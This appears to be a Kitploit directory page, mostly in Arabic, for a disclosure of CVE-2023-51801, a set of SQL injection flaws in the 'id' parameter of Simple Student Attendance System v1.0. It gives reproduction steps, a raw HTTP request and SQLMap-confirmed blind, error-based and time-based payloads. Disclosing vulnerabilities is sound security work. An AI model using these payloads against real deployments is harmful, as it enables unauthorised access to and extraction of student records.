Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-51801 — نظام حضور الطلاب البسيط v.1.0 - ثغرات حقن SQL متعددة - student_form.php و class_form.php | Kitploit
أدوات/GitHubGitHub/geraldoalcantara/cve-2023-51801
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubgeraldoalcantara/cve-2023-51801

CVE-2023-51801

نظام حضور الطلاب البسيط v.1.0 - ثغرات حقن SQL متعددة - student_form.php و class_form.php

عرض المستودع
11منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-51801

Simple Student Attendance System v.1.0 - ثغرات حقن SQL متعددة - student_form.php و class_form.php

الوصف:Simple Student Attendance System v.1.0 عرضة لثغرات حقن SQL متعددة يمكن استغلالها من قبل مهاجمين مُصادَقين. توجد هذه الثغرات في student_form.php و class_form.php، مما يسمح بتنفيذ أوامر SQL عشوائية عبر معامل 'id'.

إصدار المنتج المعرّض للخطر: Simple Student Attendance System v.1.0
مؤلف CVE: Geraldo Alcântara
التاريخ: 29/11/2023
تم التأكيد في: 10/01/2024
CVE: CVE-2023-51801
رابط CVE: https://www.cve.org/CVERecord?id=CVE-2023-51801
رابط NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-51801
رابط Tenable: https://www.tenable.com/cve/CVE-2023-51801
تم الاختبار على: Windows

خطوات إعادة الإنتاج:

لاستغلال هذه الثغرة، يجب على المهاجم الانتقال إلى صفحتي 'Student' أو 'Classes'، حيث يمكنه تعديل أو إضافة طالب أو فصل. يجب بعد ذلك إدراج الحمولة الخبيثة في معامل 'id'.
المكوّن المتأثر:

المكوّنات: student_form.php و class_form.php
المعامل: id

الطلب:

root@kitploit:~
POST /php-attendance/modals/class_form.php HTTP/1.1
Host: 192.168.68.182
Cookie: PHPSESSID=emhqgom5shgrtcii7p3a8ad1bo
Content-Length: 4
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://192.168.68.182
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.68.182/php-attendance/?page=class_list
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Priority: u=1, i
Connection: close

id=1'

SQLMap

root@kitploit:~
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1''' AND 4206=4206-- KDFY

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1''' OR (SELECT 1707 FROM(SELECT COUNT(*),CONCAT(0x716a6a7071,(SELECT (ELT(1707=1707,1))),0x717a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- xsae

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1''' AND (SELECT 1288 FROM (SELECT(SLEEP(5)))SVhp)-- EYkh

المكتشف(ون)/الاعتمادات:
Geraldo Alcântara

تنزيل الأداة